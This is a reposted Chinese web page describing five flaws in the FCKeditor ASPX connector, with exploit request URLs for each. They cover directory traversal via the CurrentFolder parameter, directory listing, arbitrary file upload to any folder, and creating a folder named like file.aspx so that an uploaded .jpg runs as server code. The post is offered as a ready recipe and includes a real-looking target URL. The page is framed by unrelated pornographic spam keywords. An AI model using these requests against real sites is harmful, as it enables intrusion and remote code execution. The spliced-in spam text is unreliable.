麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 網站 > 軟件應用 > 正文

FCKeditor 新聞組件的一些程序漏洞

2024-09-06 19:16:32
字體:
來源:轉載
供稿:網友
1 CurrentFolder 參數,可以在網站中不同目錄新建文件夾,參數使用 ../../來篡改參數,進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp


2 CurrentFolder 參數,根據返回的XML信息可以查看網站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到沒有權限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3 上傳文件時,通過修改CurrentFolder參數,可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

4 同時修改Type 和CurrentFolder 參數,可以上傳任意類型文件到網站任意目錄,基本上網站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp



5 通過創建文件夾的功能,創建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執行。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 精品国产一区二区三区四区阿崩 | 国产精品久久久久久久久久三级 | 一本免费视频 | 狠狠干91| 黄色网址在线免费播放 | 伊人成人免费视频 | 精品国产91久久久久久久妲己 | 欧产日产国产精品v | 免费视频一区 | 99麻豆久久久国产精品免费 | 黄色一级电影网 | 羞羞视频免费网站男男 | 国产精品看片 | 久久蜜桃精品一区二区三区综合网 | 亚洲激情91| 视频www| 一级黄色性感片 | 成人毛片视频在线观看 | 男女无遮挡羞羞视频 | 国产一级毛片不卡 | 香蕉国产在线视频 | 久久精品艹 | 久久精品久 | 成人国产在线看 | 最新一区二区三区 | 久草在线免费看 | 亚洲最大av网站 | 黄在线观看在线播放720p | 蜜桃久久一区二区三区 | 国产精品久久久久久久av三级 | 麻豆蜜桃在线观看 | www.91操 | 久久色伦理资源站 | 久久综合av| 91成人在线免费观看 | 亚洲一区二区三区在线看 | 九九视频精品在线观看 | 国产成年人视频 | 午夜色片 | 久久久一区二区三区精品 | 欧美不卡在线 |